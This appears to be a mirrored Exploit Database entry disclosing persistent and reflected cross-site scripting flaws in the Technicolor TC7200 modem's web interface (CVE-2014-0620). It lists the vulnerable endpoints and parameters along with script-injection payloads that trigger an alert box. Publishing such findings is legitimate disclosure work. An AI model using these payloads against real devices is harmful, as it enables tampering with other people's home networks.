Technicolor TC7200 – Multiple Cross-Site Scripting Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： Jeroen - IT Nerdbox
  日期： 2014-01-03
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/30668/

• # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
  # Google Dork: N/A
  # Date: 02-01-2013
  # Exploit Author: Jeroen - IT Nerdbox
  # Vendor Homepage:
  http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
  ays/cable-modems-gateways/tc7200-tc7300
  # Software Link: N/A
  # Version: STD6.01.12
  # Tested on: N/A
  # CVE : CVE-2014-0620
  #
  # Proof of Concept:
  # 
  # 
  ## Persistent Cross Site Scripting:
  #
  # POST: http://<ip>/parental/website-filters.asp
  # Parameters: 
  #
  # WebFilteringTable0
  # WebFilteringChangePolicies 0
  # WebFiltersADDKeywords
  # WebFilteringdomainMode 0
  # ADDNewDomain <script>alert('IT Nerdbox');</script>
  # WebFiltersKeywordButton0
  # WebFiltersDomainButton 1
  # WebPolicyName
  # WebFiltersRemove 0
  # WebFiltersADD0
  # WebFiltersReset0
  #
  #
  ## Reflected Cross Site Scripting
  #
  # POST: http://<ip>//goform/status/diagnostics-route
  # Parameters: 
  # 
  # VmTracerouteHost"><script>alert('ITNerdbox');</script>
  # VmMaxTTL30
  # VmTrIsInProgress0
  # VmTrUtilityCommand1
  # 
  # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/